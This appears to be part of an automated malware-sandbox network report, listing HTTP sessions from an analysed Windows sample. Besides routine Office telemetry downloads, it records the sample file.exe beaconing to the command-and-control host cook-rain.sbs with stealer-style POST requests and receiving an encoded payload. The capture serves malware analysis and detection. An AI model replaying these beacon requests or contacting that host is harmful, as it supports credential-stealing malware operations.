                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                15192.168.2.74971513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:20 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095420Z-r1d97b99577dd2gchC1TEBz5ys00000008d000000000fav7
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:20 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                16192.168.2.749719188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:20 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                2024-11-20 09:54:20 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=b5d3udqsite6rsnv4mtsvuajmd; expires=Sun, 16-Mar-2025 03:40:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZQU35lsrJduoI72s6fdcGAk8FTg0DemtmJvofrpbnsmiYf%2B%2B5gGCcZ%2BpGby3u0AmAx1K%2F7iWYn8U1qX0cx5BzzLCGl7RsDZML9wzQyzukWnHwy97G68tK5IgmMN51KRB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578edebce75e65-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1768625&cwnd=242&unsent_bytes=0&cid=dc129464a46e7c00&ts=456&x=0"
                                                                                                                                                                                                2024-11-20 09:54:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                2024-11-20 09:54:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                17192.168.2.74972013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                x-ms-request-id: 7511ce5b-801e-0083-468c-3af0ae000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-185f5d8b95cmd8vfhC1NYC0g40000000061g000000001fke
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                18192.168.2.74972313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 464
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                x-ms-request-id: 302bdaed-601e-003e-338c-3a3248000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-185f5d8b95c95vpshC1NYC759c0000000a200000000090w6
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                19192.168.2.74972113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-185f5d8b95cmd8vfhC1NYC0g4000000005z0000000006s2s
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                20192.168.2.74972213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-185f5d8b95cdcwrthC1NYCy5b800000009yg00000000ew3e
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                21192.168.2.74972413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                x-ms-request-id: a1cde93a-f01e-0020-638c-3a956b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-r1d97b995777mdbwhC1TEBezag00000008h000000000h8hk
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                22192.168.2.749725188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:21 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                2024-11-20 09:54:21 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=aeqjiv00pt2i51eustgo70ilca; expires=Sun, 16-Mar-2025 03:41:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqyiIZ4gayVRZRZvWXVdPMIKkmjxEvwHw4Tj5rf1%2FG7B9TPbulRsSMe1k2uoD0Zo%2BXii6mYNDgxMWmWEklhoSBhxv16TPPBlnawbo7Boif9HcZENyEiHIU0EPwGwvcZ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578ee4bceb424c-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2544&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=950&delivery_rate=1141070&cwnd=215&unsent_bytes=0&cid=2c5748c4d5356c47&ts=415&x=0"
                                                                                                                                                                                                2024-11-20 09:54:21 UTC391INData Raw: 34 64 64 0d 0a 61 50 38 4a 78 79 55 77 71 54 39 77 74 66 43 53 2b 67 58 71 72 5a 78 31 72 2f 42 75 70 35 6f 58 43 6c 79 6f 4a 6b 37 47 58 53 34 54 33 58 2f 6c 48 77 53 46 48 51 50 51 30 71 69 4f 64 35 2f 49 73 46 66 4f 6c 45 79 64 2f 48 5a 6d 4c 38 30 4b 62 4c 41 77 44 46 4b 5a 61 4b 74 57 56 59 55 64 46 63 33 53 71 4b 46 2b 79 4d 6a 79 56 35 58 53 43 38 33 34 64 6d 59 2b 79 55 30 68 74 6a 46 4e 41 4a 4e 75 72 30 42 54 7a 56 34 63 32 4a 58 33 6e 32 53 41 77 2f 55 59 78 35 31 4d 69 37 68 79 63 48 36 53 42 41 4f 6a 4b 55 38 6c 6e 6e 71 73 42 30 32 46 52 46 4c 51 6e 72 44 41 4a 34 76 49 2f 68 6e 4a 6c 41 58 50 38 6e 39 75 50 38 78 4d 50 71 38 37 52 67 43 64 62 61 35 4b 57 74 6c 54 46 74 2b 65 38 5a 56 6b 79 49 47 2b 45 4e 58 53 56 49 57 72 52 32 73 76 32 31
                                                                                                                                                                                                Data Ascii: 4ddaP8JxyUwqT9wtfCS+gXqrZx1r/Bup5oXClyoJk7GXS4T3X/lHwSFHQPQ0qiOd5/IsFfOlEyd/HZmL80KbLAwDFKZaKtWVYUdFc3SqKF+yMjyV5XSC834dmY+yU0htjFNAJNur0BTzV4c2JX3n2SAw/UYx51Mi7hycH6SBAOjKU8lnnqsB02FRFLQnrDAJ4vI/hnJlAXP8n9uP8xMPq87RgCdba5KWtlTFt+e8ZVkyIG+ENXSVIWrR2sv21
                                                                                                                                                                                                2024-11-20 09:54:21 UTC861INData Raw: 30 72 36 77 64 56 30 78 31 4b 6c 37 48 31 69 47 43 45 32 62 77 74 6a 59 31 43 33 4c 68 79 5a 48 36 53 42 43 53 68 50 45 38 42 6b 6d 69 74 54 45 44 4c 54 78 54 61 6c 2b 4b 65 59 6f 62 46 2f 51 58 48 6e 41 72 47 38 58 35 68 4f 38 31 41 62 4f 70 2f 53 78 4c 64 4d 2b 56 6d 58 38 42 52 47 4d 43 53 73 49 63 70 6b 59 2f 35 47 34 33 4b 54 4d 48 35 63 57 6b 36 78 45 6f 6f 71 44 6c 43 42 35 4a 74 72 30 64 56 77 56 55 61 31 70 2f 37 6c 32 65 4e 77 76 6f 52 77 5a 4d 4a 68 62 59 31 62 79 61 4b 48 47 79 4b 4f 45 38 59 33 31 36 6d 53 56 7a 4d 53 31 4c 49 33 4f 6e 59 59 49 53 50 70 6c 66 44 6c 77 50 58 2b 57 64 74 4d 4e 68 49 4b 61 49 79 54 77 53 64 62 71 4a 4b 58 4d 31 61 45 64 2b 57 38 5a 5a 72 67 73 7a 36 46 49 33 63 54 4d 4c 67 4e 54 42 2b 2b 30 63 6f 6f 79 31 50 42
                                                                                                                                                                                                Data Ascii: 0r6wdV0x1Kl7H1iGCE2bwtjY1C3LhyZH6SBCShPE8BkmitTEDLTxTal+KeYobF/QXHnArG8X5hO81AbOp/SxLdM+VmX8BRGMCSsIcpkY/5G43KTMH5cWk6xEooqDlCB5Jtr0dVwVUa1p/7l2eNwvoRwZMJhbY1byaKHGyKOE8Y316mSVzMS1LI3OnYYISPplfDlwPX+WdtMNhIKaIyTwSdbqJKXM1aEd+W8ZZrgsz6FI3cTMLgNTB++0cooy1PB
                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 33 66 38 66 0d 0a 38 52 55 47 39 36 41 2b 70 52 70 6d 73 4c 30 45 73 4f 65 43 63 72 34 64 47 6b 77 77 45 39 73 36 6e 39 4c 45 74 30 7a 35 57 68 66 32 30 38 59 33 49 4f 79 72 57 53 47 77 66 6b 42 6a 59 31 43 33 4c 68 79 5a 48 36 53 42 43 65 69 4d 30 41 4b 6d 33 6d 72 53 45 44 42 54 78 62 5a 6c 76 79 57 62 6f 58 41 2b 77 58 4a 6b 68 37 45 2f 58 4a 6d 4d 39 68 42 62 4f 70 2f 53 78 4c 64 4d 2b 56 39 5a 73 78 4e 41 39 44 51 78 5a 74 70 68 73 6a 6f 56 39 4c 63 46 59 58 2f 65 53 68 6d 69 6b 63 67 71 54 5a 4a 42 59 39 68 71 55 5a 41 7a 46 51 62 33 5a 50 2b 6c 32 79 45 79 75 77 63 77 70 6f 44 78 50 56 34 59 7a 72 4b 42 47 4c 6b 4f 46 52 4b 78 53 75 45 53 6c 33 5a 58 67 4f 56 70 2f 4f 57 61 59 2f 5a 76 67 69 44 69 30 7a 43 39 44 55 77 66 73 74 49 49 4b 55 77 53 67
                                                                                                                                                                                                Data Ascii: 3f8f8RUG96A+pRpmsL0EsOeCcr4dGkwwE9s6n9LEt0z5Whf208Y3IOyrWSGwfkBjY1C3LhyZH6SBCeiM0AKm3mrSEDBTxbZlvyWboXA+wXJkh7E/XJmM9hBbOp/SxLdM+V9ZsxNA9DQxZtphsjoV9LcFYX/eShmikcgqTZJBY9hqUZAzFQb3ZP+l2yEyuwcwpoDxPV4YzrKBGLkOFRKxSuESl3ZXgOVp/OWaY/ZvgiDi0zC9DUwfstIIKUwSg
